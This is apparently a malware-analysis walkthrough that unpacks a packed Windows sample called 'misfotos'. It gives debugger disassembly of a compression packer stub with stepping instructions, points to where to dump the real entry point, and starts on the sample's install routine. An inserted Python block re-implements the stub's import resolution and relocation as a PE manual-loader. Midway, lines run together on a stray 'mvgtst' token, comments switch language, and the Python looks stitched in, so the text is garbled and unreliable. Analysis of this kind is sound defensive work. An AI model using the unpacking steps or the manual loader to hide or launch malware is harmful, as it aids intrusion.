00401F86 81C9 196ABB10 OR ECX,10BB6A19
00401F8C 0B05 50F94000 OR EAX,DWORD PTR DS:[40F950]
00401F92 81E2 C985C27A AND EDX,7AC285C9
00401F98 68 5A000000 PUSH 5A
00401F9D FF15 CE914100 CALL DWORD PTR DS:[4191CE] ; GDI32.GetTextColor
00401FA3 C1F9 06 SAR ECX,6
00401FA6 C1F0 0F SAL EAX,0F
00401FA9 B9 A58554AF MOV ECX,AF5485A5
00401FAE E9 0C000000 JMP misfotos.00401FBF
00401FB3 3305 D0FE4000 XOR EAX,DWORD PTR DS:[40FED0]
00401FB9 2315 00FB4000 AND EDX,DWORD PTR DS:[40FB00]
00401FBF C3 RETN
----------------------------------------------------------------------------------------------------
Layer 3: compression packer

003C0000 55 PUSH EBP ; Entry point of the third-layer compression packer. Step down with [F8].
003C0001 8BEC MOV EBP,ESP
003C0003 81EC 90000000 SUB ESP,90
003C0009 E8 00000000 CALL 003C000E ; [F7] step into.
003C000E 58 POP EAX ; After stepping in you arrive here; keep stepping down with [F8].
003C000F 8BF0 MOV ESI,EAX
003C0011 2D 2B144000 SUB EAX,40142B
003C0016 8945 A0 MOV DWORD PTR SS:[EBP-60],EAX
003C0019 81E6 00F0FFFF AND ESI,FFFFF000
003C001F 8975 B0 MOV DWORD PTR SS:[EBP-50],ESI
003C0022 8B75 04 MOV ESI,DWORD PTR SS:[EBP+4]
003C0025 81E6 00F0FFFF AND ESI,FFFFF000
003C002B 66:813E 4D5A CMP WORD PTR DS:[ESI],5A4D
003C0030 74 08 JE SHORT 003C003A
003C0032 81EE 00100000 SUB ESI,1000
003C0038 ^ EB F1 JMP SHORT 003C002B ; Do not take this loop's backward jump.
003C003A 8B46 3C MOV EAX,DWORD PTR DS:[ESI+3C] ; [F4] run to here, then keep stepping down with [F8].
003C003D 3D 00200000 CMP EAX,2000
003C0042 ^ 77 EE JA SHORT 003C0032
003C0044 03C6 ADD EAX,ESI
003C0046 8138 50450000 CMP DWORD PTR DS:[EAX],4550
003C004C ^ 75 E4 JNZ SHORT 003C0032
003C004E 8975 C8 MOV DWORD PTR SS:[EBP-38],ESI
003C0051 8B46 3C MOV EAX,DWORD PTR DS:[ESI+3C]
003C0054 0345 C8 ADD EAX,DWORD PTR SS:[EBP-38]
003C0057 8B48 28 MOV ECX,DWORD PTR DS:[EAX+28]
003C005A 034D C8 ADD ECX,DWORD PTR SS:[EBP-38]
003C005D 894D AC MOV DWORD PTR SS:[EBP-54],ECX
003C0060 64:A1 30000000 MOV EAX,DWORD PTR FS:[30]
003C0066 8B40 0C MOV EAX,DWORD PTR DS:[EAX+C]
003C0069 8B40 1C MOV EAX,DWORD PTR DS:[EAX+1C]
003C006C 8B00 MOV EAX,DWORD PTR DS:[EAX]
003C006E 8B40 08 MOV EAX,DWORD PTR DS:[EAX+8]
003C0071 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX
003C0074 B8 44332211 MOV EAX,11223344
003C0079 B8 44332211 MOV EAX,11223344
003C007E 68 00700000 PUSH 7000
003C0083 68 7BD1486C PUSH 6C48D17B
003C0088 68 691EAD0F PUSH 0FAD1E69
003C008D 68 00880000 PUSH 8800
003C0092 8F45 80 POP DWORD PTR SS:[EBP-80]
003C0095 8F85 70FFFFFF POP DWORD PTR SS:[EBP-90]
003C009B 8F45 94 POP DWORD PTR SS:[EBP-6C]
003C009E 8F45 9C POP DWORD PTR SS:[EBP-64]
003C00A1 8D35 8D184000 LEA ESI,DWORD PTR DS:[40188D]
003C00A7 0375 A0 ADD ESI,DWORD PTR SS:[EBP-60]
003C00AA 8D7D D8 LEA EDI,DWORD PTR SS:[EBP-28]
003C00AD 56 PUSH ESI
003C00AE 56 PUSH ESI
003C00AF FF75 F8 PUSH DWORD PTR SS:[EBP-8]
003C00B2 E8 22030000 CALL 003C03D9 ; This CALL can be stepped over directly with [F8].
003C00B7 AB STOS DWORD PTR ES:[EDI]

003C00B8 5E POP ESI
003C00B9 46 INC ESI
003C00BA 807E FF 00 CMP BYTE PTR DS:[ESI-1],0
003C00BE ^ 75 F9 JNZ SHORT 003C00B9 ; Do not take this loop's backward jump.
003C00C0 803E AB CMP BYTE PTR DS:[ESI],0AB ; [F4] run to here, then keep stepping down with [F8].
003C00C3 ^ 75 E8 JNZ SHORT 003C00AD ; Do not take this loop's backward jump.
003C00C5 8B5D 94 MOV EBX,DWORD PTR SS:[EBP-6C] ; [F4] run to here, then keep stepping down with [F8].
003C00C8 8B95 70FFFFFF MOV EDX,DWORD PTR SS:[EBP-90]
003C00CE 8B4D 80 MOV ECX,DWORD PTR SS:[EBP-80]
003C00D1 60 PUSHAD
003C00D2 6A 40 PUSH 40
003C00D4 68 00100000 PUSH 1000
003C00D9 51 PUSH ECX
003C00DA 6A 00 PUSH 0
003C00DC FF55 E8 CALL DWORD PTR SS:[EBP-18]
003C00DF 8945 90 MOV DWORD PTR SS:[EBP-70],EAX
003C00E2 0BC0 OR EAX,EAX
003C00E4 61 POPAD
003C00E5 0F84 D8020000 JE 003C03C3
003C00EB C1E9 02 SHR ECX,2
003C00EE 8B75 9C MOV ESI,DWORD PTR SS:[EBP-64]
003C00F1 0375 C8 ADD ESI,DWORD PTR SS:[EBP-38]
003C00F4 8B7D 90 MOV EDI,DWORD PTR SS:[EBP-70]
003C00F7 AD LODS DWORD PTR DS:[ESI]
003C00F8 2BC2 SUB EAX,EDX
003C00FA 33C3 XOR EAX,EBX
003C00FC AB STOS DWORD PTR ES:[EDI]
003C00FD ^ E2 F8 LOOPD SHORT 003C00F7 ; Do not take this loop's backward jump.
003C00FF 8B45 90 MOV EAX,DWORD PTR SS:[EBP-70] ; [F4] run to here, then keep stepping down with [F8].
003C0102 8B58 3C MOV EBX,DWORD PTR DS:[EAX+3C]
003C0105 035D 90 ADD EBX,DWORD PTR SS:[EBP-70]
003C0108 895D B4 MOV DWORD PTR SS:[EBP-4C],EBX
003C010B 8D83 F8000000 LEA EAX,DWORD PTR DS:[EBX+F8]
003C0111 8945 BC MOV DWORD PTR SS:[EBP-44],EAX
003C0114 0FB743 06 MOVZX EAX,WORD PTR DS:[EBX+6]
003C0118 8945 A4 MOV DWORD PTR SS:[EBP-5C],EAX
003C011B 8B43 28 MOV EAX,DWORD PTR DS:[EBX+28]
003C011E 8985 78FFFFFF MOV DWORD PTR SS:[EBP-88],EAX
003C0124 8B83 80000000 MOV EAX,DWORD PTR DS:[EBX+80]
003C012A 8945 98 MOV DWORD PTR SS:[EBP-68],EAX
003C012D 8B43 50 MOV EAX,DWORD PTR DS:[EBX+50]
003C0130 8985 74FFFFFF MOV DWORD PTR SS:[EBP-8C],EAX
003C0136 8B45 90 MOV EAX,DWORD PTR SS:[EBP-70]
003C0139 8B58 3C MOV EBX,DWORD PTR DS:[EAX+3C]
003C013C 035D C8 ADD EBX,DWORD PTR SS:[EBP-38]
003C013F 895D C4 MOV DWORD PTR SS:[EBP-3C],EBX
003C0142 81C3 F8000000 ADD EBX,0F8
003C0148 895D BC MOV DWORD PTR SS:[EBP-44],EBX
003C014B 8D45 D0 LEA EAX,DWORD PTR SS:[EBP-30]
003C014E 50 PUSH EAX
003C014F 6A 40 PUSH 40
003C0151 FFB5 74FFFFFF PUSH DWORD PTR SS:[EBP-8C]
003C0157 FF75 C8 PUSH DWORD PTR SS:[EBP-38]
003C015A FF55 E4 CALL DWORD PTR SS:[EBP-1C]
003C015D 0BC0 OR EAX,EAX
003C015F 0F84 5E020000 JE 003C03C3
003C0165 8B8D 74FFFFFF MOV ECX,DWORD PTR SS:[EBP-8C]
003C016B C1E9 02 SHR ECX,2
003C016E 33C0 XOR EAX,EAX
003C0170 8B7D C8 MOV EDI,DWORD PTR SS:[EBP-38]
003C0173 F3:AB REP STOS DWORD PTR ES:[EDI]
003C0175 B9 00100000 MOV ECX,1000
003C017A 8B75 90 MOV ESI,DWORD PTR SS:[EBP-70]
003C017D 8B7D C8 MOV EDI,DWORD PTR SS:[EBP-38]
003C0180 E8 23020000 CALL 003C03A8 ; This CALL can be stepped over directly with [F8].
003C0185 8B55 A4 MOV EDX,DWORD PTR SS:[EBP-5C]
003C0188 8B5D B4 MOV EBX,DWORD PTR SS:[EBP-4C]
003C018B 81C3 F8000000 ADD EBX,0F8
003C0191 8B75 90 MOV ESI,DWORD PTR SS:[EBP-70]
003C0194 0373 14 ADD ESI,DWORD PTR DS:[EBX+14]
003C0197 8B7D C8 MOV EDI,DWORD PTR SS:[EBP-38]
003C019A 037B 0C ADD EDI,DWORD PTR DS:[EBX+C]
003C019D 8B4B 10 MOV ECX,DWORD PTR DS:[EBX+10]
003C01A0 E8 03020000 CALL 003C03A8 ; This CALL can be stepped over directly with [F8].
003C01A5 83C3 28 ADD EBX,28
003C01A8 4A DEC EDX
003C01A9 ^ 75 E6 JNZ SHORT 003C0191 ; Do not take this loop's backward jump.
003C01AB 68 00800000 PUSH 8000 ; [F4] run to here, then keep stepping down with [F8].
003C01B0 6A 00 PUSH 0
003C01B2 FF75 90 PUSH DWORD PTR SS:[EBP-70]
003C01B5 FF55 EC CALL DWORD PTR SS:[EBP-14]
003C01B8 8B5D C4 MOV EBX,DWORD PTR SS:[EBP-3C]
003C01BB 8B83 80000000 MOV EAX,DWORD PTR DS:[EBX+80]
003C01C1 0BC0 OR EAX,EAX
003C01C3 0F84 9B000000 JE 003C0264
003C01C9 0345 C8 ADD EAX,DWORD PTR SS:[EBP-38]
003C01CC 8945 FC MOV DWORD PTR SS:[EBP-4],EAX
003C01CF C745 B8 0000000>MOV DWORD PTR SS:[EBP-48],0
003C01D6 8B5D FC MOV EBX,DWORD PTR SS:[EBP-4]
003C01D9 8B43 0C MOV EAX,DWORD PTR DS:[EBX+C]
003C01DC 0BC0 OR EAX,EAX
003C01DE 0F84 80000000 JE 003C0264
003C01E4 0345 C8 ADD EAX,DWORD PTR SS:[EBP-38]
003C01E7 50 PUSH EAX
003C01E8 50 PUSH EAX
003C01E9 FF55 DC CALL DWORD PTR SS:[EBP-24]
003C01EC 0BC0 OR EAX,EAX
003C01EE 59 POP ECX
003C01EF 75 04 JNZ SHORT 003C01F5
003C01F1 51 PUSH ECX
003C01F2 FF55 E0 CALL DWORD PTR SS:[EBP-20]
003C01F5 8945 C0 MOV DWORD PTR SS:[EBP-40],EAX
003C01F8 8B5D FC MOV EBX,DWORD PTR SS:[EBP-4]
003C01FB 8B43 10 MOV EAX,DWORD PTR DS:[EBX+10]
003C01FE 0345 C8 ADD EAX,DWORD PTR SS:[EBP-38]
003C0201 8945 A8 MOV DWORD PTR SS:[EBP-58],EAX
003C0204 8B03 MOV EAX,DWORD PTR DS:[EBX]
003C0206 0BC0 OR EAX,EAX
003C0208 75 14 JNZ SHORT 003C021E
003C020A 8B45 A8 MOV EAX,DWORD PTR SS:[EBP-58]
003C020D 2B45 C8 SUB EAX,DWORD PTR SS:[EBP-38]
003C0210 3D FFFFAF00 CMP EAX,0AFFFFF
003C0215 77 44 JA SHORT 003C025B
003C0217 3D 00100000 CMP EAX,1000
003C021C 72 3D JB SHORT 003C025B
003C021E 0345 C8 ADD EAX,DWORD PTR SS:[EBP-38]
003C0221 8945 D4 MOV DWORD PTR SS:[EBP-2C],EAX
003C0224 8B75 D4 MOV ESI,DWORD PTR SS:[EBP-2C]
003C0227 0375 B8 ADD ESI,DWORD PTR SS:[EBP-48]
003C022A 8B36 MOV ESI,DWORD PTR DS:[ESI]
003C022C 0BF6 OR ESI,ESI
003C022E 74 2B JE SHORT 003C025B
003C0230 8BC6 MOV EAX,ESI
003C0232 25 00000080 AND EAX,80000000
003C0237 74 08 JE SHORT 003C0241
003C0239 81E6 FFFFFF4F AND ESI,4FFFFFFF
003C023F EB 06 JMP SHORT 003C0247
003C0241 0375 C8 ADD ESI,DWORD PTR SS:[EBP-38]
003C0244 83C6 02 ADD ESI,2
003C0247 56 PUSH ESImvgtst 003C0248 FF75 C0 PUSH DWORD PTR SS:[EBP-40]mvgtst 003C024B FF55 D8 CALL DWORD PTR SS:[EBP-28]mvgtst 003C024E 8B7D B8 MOV EDI,DWORD PTR SS:[EBP-48]mvgtst 003C0251 037D A8 ADD EDI,DWORD PTR SS:[EBP-58]mvgtst 003C0254 AB STOS DWORD PTR ES:[EDI]mvgtst 003C0255 8345 B8 04 ADD DWORD PTR SS:[EBP-48],4mvgtst 003C0259 ^ EB C9 JMP SHORT 003C0224 ; 这里的循环回跳不要跳.mvgtst 003C025B 8345 FC 14 ADD DWORD PTR SS:[EBP-4],14 ; 我们[F4]执行到这里,继续[F8]向下走.mvgtst 003C025F ^ E9 6BFFFFFF JMP 003C01CF ; 这里的循环回跳不要跳.mvgtst 003C0264 8B45 C4 MOV EAX,DWORD PTR SS:[EBP-3C] ; 我们[F4]执行到这里,继续[F8]向下走.mvgtst 003C0267 8B70 34 MOV ESI,DWORD PTR DS:[EAX+34]mvgtst 003C026A 8975 88 MOV DWORD PTR SS:[EBP-78],ESImvgtst 003C026D 8BB0 A0000000 MOV ESI,DWORD PTR DS:[EAX+A0]mvgtst 003C0273 0BF6 OR ESI,ESImvgtst 003C0275 74 47 JE SHORT 003C02BEmvgtst 003C0277 FFB0 A4000000 PUSH DWORD PTR DS:[EAX+A4]mvgtst 003C027D 8F45 CC POP DWORD PTR SS:[EBP-34]mvgtst 003C0280 0375 C8 ADD ESI,DWORD PTR SS:[EBP-38]mvgtst 003C0283 8B5D C8 MOV EBX,DWORD PTR SS:[EBP-38]mvgtst 003C0286 2B5D 88 SUB EBX,DWORD PTR SS:[EBP-78]mvgtst 003C0289 AD LODS DWORD PTR DS:[ESI]mvgtst 003C028A 8BF8 MOV EDI,EAXmvgtst 003C028C AD LODS DWORD PTR DS:[ESI]mvgtst 003C028D 8BC8 MOV ECX,EAXmvgtst 003C028F 83F8 08 CMP EAX,8mvgtst 003C0292 7E 2A JLE SHORT 003C02BEmvgtst 003C0294 294D CC SUB DWORD PTR SS:[EBP-34],ECXmvgtst 003C0297 83E9 08 SUB ECX,8mvgtst 003C029A D1E9 SHR ECX,1mvgtst 003C029C 33C0 XOR EAX,EAXmvgtst 003C029E 66:AD LODS WORD PTR DS:[ESI]mvgtst 003C02A0 8BD0 MOV EDX,EAXmvgtst 003C02A2 C1EA 0C SHR EDX,0Cmvgtst 003C02A5 83FA 03 CMP EDX,3mvgtst 003C02A8 75 0C JNZ SHORT 003C02B6mvgtst 003C02AA 25 FF0F0000 AND EAX,0FFFmvgtst 003C02AF 0345 C8 ADD EAX,DWORD PTR SS:[EBP-38]mvgtst 003C02B2 03C7 ADD EAX,EDImvgtst 003C02B4 0118 ADD DWORD PTR DS:[EAX],EBXmvgtst 003C02B6 ^ E2 E4 LOOPD SHORT 003C029Cmvgtst 003C02B8 837D CC 00 CMP DWORD PTR SS:[EBP-34],0mvgtst 003C02BC ^ 7F CB JG SHORT 003C0289mvgtst 003C02BE 8B45 C8 MOV EAX,DWORD PTR 
SS:[EBP-38]mvgtst 003C02C1 0185 78FFFFFF ADD DWORD PTR SS:[EBP-88],EAXmvgtst 003C02C7 8B45 C8 MOV EAX,DWORD PTR SS:[EBP-38]mvgtst 003C02CA 3B85 78FFFFFF CMP EAX,DWORD PTR SS:[EBP-88]mvgtst 003C02D0 75 0A JNZ SHORT 003C02DCmvgtst 003C02D2 C785 78FFFFFF 0>MOV DWORD PTR SS:[EBP-88],0mvgtst 003C02DC 8B4D C8 MOV ECX,DWORD PTR SS:[EBP-38]mvgtst 003C02DF 64:A1 18000000 MOV EAX,DWORD PTR FS:[18]mvgtst 003C02E5 8B40 30 MOV EAX,DWORD PTR DS:[EAX+30]mvgtst 003C02E8 8B70 08 MOV ESI,DWORD PTR DS:[EAX+8]mvgtst 003C02EB 3B75 C8 CMP ESI,DWORD PTR SS:[EBP-38]mvgtst 003C02EE 74 1E JE SHORT 003C030Emvgtst 003C02F0 8B40 0C MOV EAX,DWORD PTR DS:[EAX+C]mvgtst 003C02F3 8B40 1C MOV EAX,DWORD PTR DS:[EAX+1C]mvgtst 003C02F6 BA 00100000 MOV EDX,1000mvgtst 003C02FB 4A DEC EDXmvgtst 003C02FC 74 10 JE SHORT 003C030Emvgtst 003C02FE 8B00 MOV EAX,DWORD PTR DS:[EAX]mvgtst 003C0300 3B48 08 CMP ECX,DWORD PTR DS:[EAX+8]mvgtst 003C0303 ^ 75 F6 JNZ SHORT 003C02FBmvgtst 003C0305 8BB5 78FFFFFF MOV ESI,DWORD PTR SS:[EBP-88]mvgtst 003C030B 8970 0C MOV DWORD PTR DS:[EAX+C],ESImvgtst 003C030E 8D45 D0 LEA EAX,DWORD PTR SS:[EBP-30]mvgtst 003C0311 50 PUSH EAXmvgtst 003C0312 6A 20 PUSH 20mvgtst 003C0314 FFB5 74FFFFFF PUSH DWORD PTR SS:[EBP-8C]mvgtst 003C031A FF75 C8 PUSH DWORD PTR SS:[EBP-38]mvgtst 003C031D FF55 E4 CALL DWORD PTR SS:[EBP-1C]mvgtst 003C0320 8B75 C4 MOV ESI,DWORD PTR SS:[EBP-3C]mvgtst 003C0323 0FB74E 06 MOVZX ECX,WORD PTR DS:[ESI+6]mvgtst 003C0327 81C6 F8000000 ADD ESI,0F8mvgtst 003C032D 60 PUSHADmvgtst 003C032E 8B46 24 MOV EAX,DWORD PTR DS:[ESI+24]mvgtst 003C0331 25 00000080 AND EAX,80000000mvgtst 003C0336 74 13 JE SHORT 003C034Bmvgtst 003C0338 8D45 D0 LEA EAX,DWORD PTR SS:[EBP-30]mvgtst 003C033B 50 PUSH EAXmvgtst 003C033C 6A 40 PUSH 40mvgtst 003C033E FF76 08 PUSH DWORD PTR DS:[ESI+8]mvgtst 003C0341 8B46 0C MOV EAX,DWORD PTR DS:[ESI+C]mvgtst 003C0344 0345 C8 ADD EAX,DWORD PTR SS:[EBP-38]mvgtst 003C0347 50 PUSH EAXmvgtst 003C0348 FF55 E4 CALL DWORD PTR SS:[EBP-1C]mvgtst 003C034B 61 POPADmvgtst 
003C034C 83C6 28 ADD ESI,28mvgtst 003C034F ^ E2 DC LOOPD SHORT 003C032D ; 这里的循环回跳不要跳.mvgtst 003C0351 83BD 78FFFFFF 0>CMP DWORD PTR SS:[EBP-88],0 ; 我们[F4]执行到这里,继续[F8]向下走.mvgtst 003C0358 75 26 JNZ SHORT 003C0380mvgtst 003C035A 8BE5 MOV ESP,EBPmvgtst 003C035C 5D POP EBPmvgtst 003C035D 83C4 04 ADD ESP,4mvgtst 003C0360 8B4C24 18 MOV ECX,DWORD PTR SS:[ESP+18]mvgtst 003C0364 8B5424 14 MOV EDX,DWORD PTR SS:[ESP+14]mvgtst 003C0368 8B5C24 10 MOV EBX,DWORD PTR SS:[ESP+10]mvgtst 003C036C 8B6C24 08 MOV EBP,DWORD PTR SS:[ESP+8]mvgtst 003C0370 8B7424 04 MOV ESI,DWORD PTR SS:[ESP+4]mvgtst 003C0374 8B3C24 MOV EDI,DWORD PTR SS:[ESP]mvgtst 003C0377 83C4 20 ADD ESP,20mvgtst 003C037A B8 01000000 MOV EAX,1mvgtst 003C037F C3 RETNmvgtst 003C0380 8B85 78FFFFFF MOV EAX,DWORD PTR SS:[EBP-88]mvgtst 003C0386 8BE5 MOV ESP,EBPmvgtst 003C0388 5D POP EBPmvgtst 003C0389 83C4 04 ADD ESP,4mvgtst 003C038C 8B4C24 18 MOV ECX,DWORD PTR SS:[ESP+18]mvgtst 003C0390 8B5424 14 MOV EDX,DWORD PTR SS:[ESP+14]mvgtst 003C0394 8B5C24 10 MOV EBX,DWORD PTR SS:[ESP+10]mvgtst 003C0398 8B6C24 08 MOV EBP,DWORD PTR SS:[ESP+8]mvgtst 003C039C 8B7424 04 MOV ESI,DWORD PTR SS:[ESP+4]mvgtst 003C03A0 8B3C24 MOV EDI,DWORD PTR SS:[ESP]mvgtst 003C03A3 83C4 20 ADD ESP,20mvgtst 003C03A6 - FFE0 JMP EAX ; 这里是关键跳转,它会跳向下一个OEP入口处.mvgtst 003C03A8 52 PUSH EDXmvgtst 003C03A9 8BD1 MOV EDX,ECXmvgtst 003C03AB C1E9 02 SHR ECX,2mvgtst 003C03AE 83E2 03 AND EDX,3mvgtst 003C03B1 0BC9 OR ECX,ECXmvgtst 003C03B3 74 02 JE SHORT 003C03B7mvgtst 003C03B5 F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>mvgtst 003C03B7 03CA ADD ECX,EDXmvgtst 003C03B9 0BC9 OR ECX,ECXmvgtst 003C03BB 74 04 JE SHORT 003C03C1mvgtst 003C03BD 8BCA MOV ECX,EDXmvgtst 003C03BF F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>mvgtst 003C03C1 5A POP EDXmvgtst 003C03C2 C3 RETNmvgtst ----------------------------------------------------------------------------------------------------mvgtst 
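The two loops above are the third-layer stub doing the Windows loader's work for the hidden image: 003C01CF-003C025F walks the import descriptors and writes resolved addresses into the IAT in place, and 003C0289-003C02BC applies HIGHLOW base relocations by the load delta. The Python below is an added example, not the author's code or anything from the sample, that re-implements both steps and runs them against a constructed mini image; the DLL name, export names, RVAs and addresses (demo32.dll, DemoFunction, 0x1000x RVAs, 0x1000xxxx addresses, PREFERRED_IMAGE_BASE) are all made up for the demo, and a dictionary stands in for GetModuleHandle/LoadLibrary/GetProcAddress.

```python
"""Added example (not the author's code): a Python re-implementation of the two PE loader
steps the third-layer stub performs, import resolution (003C01CF-003C025F) and base
relocation (003C0289-003C02BC), run against a constructed mini image so it executes offline.
All names, RVAs and addresses below are made up for the demo."""
import struct

IMAGE_ORDINAL_FLAG32 = 0x80000000      # the AND EAX,80000000 test at 003C0232
IMAGE_REL_BASED_HIGHLOW = 3            # the CMP EDX,3 at 003C02A5
IMPORT_DESCRIPTOR_SIZE = 0x14          # the ADD DWORD PTR [EBP-4],14 at 003C025B
PREFERRED_IMAGE_BASE = 0x00400000      # assumed OptionalHeader.ImageBase of the demo image


def cstr(image, rva):
    """Read a NUL-terminated ASCII string at an RVA of the in-memory image."""
    return image[rva:image.index(b'\0', rva)].decode('ascii')


def resolve_imports(image, import_rva, resolver):
    """Walk IMAGE_IMPORT_DESCRIPTORs (+0 OriginalFirstThunk, +0xC Name, +0x10 FirstThunk)
    until one with Name == 0 and overwrite every FirstThunk slot with the resolved address,
    as the stub's STOS does at 003C0254. resolver(dll, name_or_ordinal) stands in for the
    module lookup and GetProcAddress-style calls made through [EBP-24]/[EBP-20]/[EBP-28]."""
    resolved = []
    pos = import_rva
    while True:
        oft, _, _, name_rva, ft = struct.unpack_from('<IIIII', image, pos)
        if name_rva == 0:
            break
        # the stub reads thunks from OriginalFirstThunk, falling back to FirstThunk when it
        # is 0 and skipping the descriptor if that RVA is outside 0x1000..0xAFFFFF
        if oft == 0 and not 0x1000 <= ft <= 0x00AFFFFF:
            pos += IMPORT_DESCRIPTOR_SIZE
            continue
        lookup = oft if oft else ft
        dll = cstr(image, name_rva)
        i = 0
        while True:
            thunk, = struct.unpack_from('<I', image, lookup + 4 * i)
            if thunk == 0:
                break
            if thunk & IMAGE_ORDINAL_FLAG32:
                target = thunk & 0xFFFF           # by ordinal (standard mask; the stub uses 0x4FFFFFFF)
            else:
                target = cstr(image, thunk + 2)   # skip IMAGE_IMPORT_BY_NAME.Hint, as ADD ESI,2 does
            addr = resolver(dll, target)
            struct.pack_into('<I', image, ft + 4 * i, addr)   # fill the IAT slot
            resolved.append((dll, target, addr))
            i += 1
        pos += IMPORT_DESCRIPTOR_SIZE
    return resolved


def apply_relocations(image, reloc_rva, reloc_size, delta):
    """Process IMAGE_BASE_RELOCATION blocks (VirtualAddress, SizeOfBlock, then WORD entries);
    for every type-3 (HIGHLOW) entry add the load delta to the DWORD at VirtualAddress+offset.
    Mirrors the LODS/LOOPD loop at 003C0289-003C02BC, including the SizeOfBlock <= 8 exit."""
    pos, remaining, patched = reloc_rva, reloc_size, 0
    while remaining > 0:
        va, size = struct.unpack_from('<II', image, pos)
        if size <= 8:
            break
        remaining -= size
        for i in range((size - 8) // 2):
            entry, = struct.unpack_from('<H', image, pos + 8 + 2 * i)
            if entry >> 12 == IMAGE_REL_BASED_HIGHLOW:
                off = va + (entry & 0xFFF)
                value, = struct.unpack_from('<I', image, off)
                struct.pack_into('<I', image, off, (value + delta) & 0xFFFFFFFF)
                patched += 1
        pos += size
    return patched


def put(image, rva, data):
    image[rva:rva + len(data)] = data


def build_demo_image():
    """Constructed 0x3000-byte image: one descriptor importing two functions from a made-up
    demo32.dll (one by name, one by ordinal) and one relocation block covering two absolute
    pointers that assume PREFERRED_IMAGE_BASE."""
    img = bytearray(0x3000)
    put(img, 0x1000, b'demo32.dll\0')                              # descriptor Name
    struct.pack_into('<H', img, 0x1010, 0x0123)                    # IMAGE_IMPORT_BY_NAME.Hint
    put(img, 0x1012, b'DemoFunction\0')                            # IMAGE_IMPORT_BY_NAME.Name
    struct.pack_into('<III', img, 0x1100, 0x1010, IMAGE_ORDINAL_FLAG32 | 7, 0)   # OriginalFirstThunk
    struct.pack_into('<III', img, 0x1200, 0x1010, IMAGE_ORDINAL_FLAG32 | 7, 0)   # FirstThunk (IAT)
    struct.pack_into('<IIIII', img, 0x1300, 0x1100, 0, 0, 0x1000, 0x1200)       # descriptor; zeros after it terminate
    struct.pack_into('<II', img, 0x2000, PREFERRED_IMAGE_BASE + 0x2B96, PREFERRED_IMAGE_BASE + 0x91C4)
    struct.pack_into('<IIHH', img, 0x2800, 0x2000, 12, (3 << 12) | 0x0, (3 << 12) | 0x4)  # one block, two entries
    return img


def run_demo(actual_base=0x00500000):
    """Simulate the stub loading the demo image at actual_base: fill the IAT, then relocate."""
    img = build_demo_image()
    fake_exports = {('demo32.dll', 'DemoFunction'): 0x10001000, ('demo32.dll', 7): 0x10002000}
    resolved = resolve_imports(img, 0x1300, lambda dll, sym: fake_exports[(dll, sym)])
    patched = apply_relocations(img, 0x2800, 12, actual_base - PREFERRED_IMAGE_BASE)
    return {
        'resolved': resolved,
        'iat': struct.unpack_from('<II', img, 0x1200),
        'relocs_patched': patched,
        'pointers': struct.unpack_from('<II', img, 0x2000),
    }


if __name__ == '__main__':
    print(run_demo())
```

This also explains why the dump taken at 00402B96 runs without IAT repair: the stub only overwrites FirstThunk slots and leaves OriginalFirstThunk and the name strings in place, so the import directory in the dumped file still describes every import and the Windows loader simply redoes the same resolution at load time.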
----------------------------------------------------------------------------------------------------
Unpacking done; the program's real entry point:

00402B96 55 PUSH EBP ; the real entry point after unpacking: dump here (the import table is intact, so the saved dump runs as-is).
00402B97 8BEC MOV EBP,ESP
00402B99 81EC E4070000 SUB ESP,7E4
00402B9F 6A 01 PUSH 1
00402BA1 FF15 A0804000 CALL DWORD PTR DS:[4080A0] ; kernel32.SetErrorMode
00402BA7 68 04010000 PUSH 104
00402BAC 6A 00 PUSH 0
00402BAE 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00402BB4 50 PUSH EAX
00402BB5 E8 80440000 CALL misfotos.0040703A ; JMP to msvcrt.memset
00402BBA 83C4 0C ADD ESP,0C
00402BBD 68 04010000 PUSH 104
00402BC2 6A 00 PUSH 0
00402BC4 8D85 ACF8FFFF LEA EAX,DWORD PTR SS:[EBP-754]
00402BCA 50 PUSH EAX
00402BCB E8 6A440000 CALL misfotos.0040703A ; JMP to msvcrt.memset
00402BD0 83C4 0C ADD ESP,0C
00402BD3 68 04010000 PUSH 104
00402BD8 6A 00 PUSH 0
00402BDA 8D85 B4F9FFFF LEA EAX,DWORD PTR SS:[EBP-64C]
00402BE0 50 PUSH EAX
00402BE1 E8 54440000 CALL misfotos.0040703A ; JMP to msvcrt.memset
00402BE6 83C4 0C ADD ESP,0C
00402BE9 68 04010000 PUSH 104
00402BEE 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00402BF4 50 PUSH EAX
00402BF5 6A 00 PUSH 0
00402BF7 FF15 9C804000 CALL DWORD PTR DS:[40809C] ; kernel32.GetModuleHandleA
00402BFD 50 PUSH EAX
00402BFE FF15 98804000 CALL DWORD PTR DS:[408098] ; kernel32.GetModuleFileNameA
00402C04 68 04010000 PUSH 104
00402C09 8D85 B4F9FFFF LEA EAX,DWORD PTR SS:[EBP-64C]
00402C0F 50 PUSH EAX
00402C10 FF15 94804000 CALL DWORD PTR DS:[408094] ; kernel32.GetSystemDirectoryA
----------------------------------------------------------------------------------------------------
****************************************************************************************************

****************************************************************************************************
2. Sample analysis:

----------------------------------------------------------------------------------------------------
1) The install path (the sample is not yet running from system32):

00402B96 55 PUSH EBP ; program entry point.
00402B97 8BEC MOV EBP,ESP
00402B99 81EC E4070000 SUB ESP,7E4
00402B9F 6A 01 PUSH 1 ; ErrorMode = SEM_FAILCRITICALERRORS
00402BA1 FF15 A0804000 CALL DWORD PTR DS:[4080A0] ; kernel32.SetErrorMode
00402BA7 68 04010000 PUSH 104
00402BAC 6A 00 PUSH 0
00402BAE 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104]
00402BB4 50 PUSH EAX
00402BB5 E8 80440000 CALL misfotos.0040703A ; JMP to msvcrt.memset
00402BBA 83C4 0C ADD ESP,0C
00402BBD 68 04010000 PUSH 104
00402BC2 6A 00 PUSH 0
00402BC4 8D85 ACF8FFFF LEA EAX,DWORD PTR SS:[EBP-754]
00402BCA 50 PUSH EAX
00402BCB E8 6A440000 CALL misfotos.0040703A ; JMP to msvcrt.memset
00402BD0 83C4 0C ADD ESP,0C
00402BD3 68 04010000 PUSH 104
00402BD8 6A 00 PUSH 0
00402BDA 8D85 B4F9FFFF LEA EAX,DWORD PTR SS:[EBP-64C]
00402BE0 50 PUSH EAX
00402BE1 E8 54440000 CALL misfotos.0040703A ; JMP to msvcrt.memset
